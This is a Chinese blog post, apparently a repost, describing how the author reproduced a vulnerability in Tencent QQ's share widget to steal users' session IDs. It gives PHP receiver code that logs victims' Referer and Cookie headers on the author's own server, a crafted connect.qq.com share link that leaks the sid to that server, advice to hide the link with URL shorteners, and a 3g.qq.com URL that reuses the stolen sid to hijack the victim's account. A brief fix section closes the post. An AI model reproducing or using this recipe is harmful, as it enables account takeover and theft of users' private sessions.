白天在公司看到这个链接:https://butian.360.cn/vul/info/qid/QTVA-2016-368828
感觉牛逼哄哄的样子
然后乌云也有...http://wooyun.org/bugs/wooyun-2016-0172586
我想对这位大牛说
你太TM牛了 双投还TM那么明显 2333333 1W泡汤了吧?
然后下午就有人在社区公布了大致思路:http://zone.wooyun.org/content/25155
然后自己就赶紧测试复现一下
还真让我测试成功了 过程如下:
首先先在自己的博客或者shell上建立个文件 我这用PHP写了一个渣渣的接收
$txt = "cookie.txt"; //保存的文件
$file = fopen($txt,"a+"); //读写方式打开
以下是代码片段: fwrite($file,"/r/nREFERER:".var_export($_SERVER[’HTTP_REFERER’],true)."/r/nCookie:".var_export($_SERVER[’HTTP_COOKIE’],true)."/r/n--------------------------------------".date("Y-m-d H:i:s",time())); //写入 fclose($file); //释放 ?> 然后构造地址: http://connect.qq.com/widget/shareqq/index.html?url=http://www.t0n9.com/q.php&desc=&title=&summary=&pics=http://www.t0n9.com/q.php&flash=&sit&style=201&width=32&height=32 太长可以用短网址 缩短 http://www.dwz.cn |
用户访问后的效果

感觉这个有点鸡肋 有点随机性 大多数都没有携带sid过来 不过用手机访问可以增加概率
下面是接收到的信息

然后构造url手机访问如:
以下是代码片段: http://q32.3g.qq.com/g/s?sid=你获取的Sid&3G_UIN=123123&saveURL=0&new3gqq=true&aid=nqqchatMain |
uin无需获取,3g登录会自动反填。
效果:


三、修复方案:
删掉get访问时的SID
用户自防:开启设备锁
原文地址:https://www.77169.com/hack/201601/223944.shtm
这篇日志的 t.cn 短域名为:http://t.cn/RclNkvn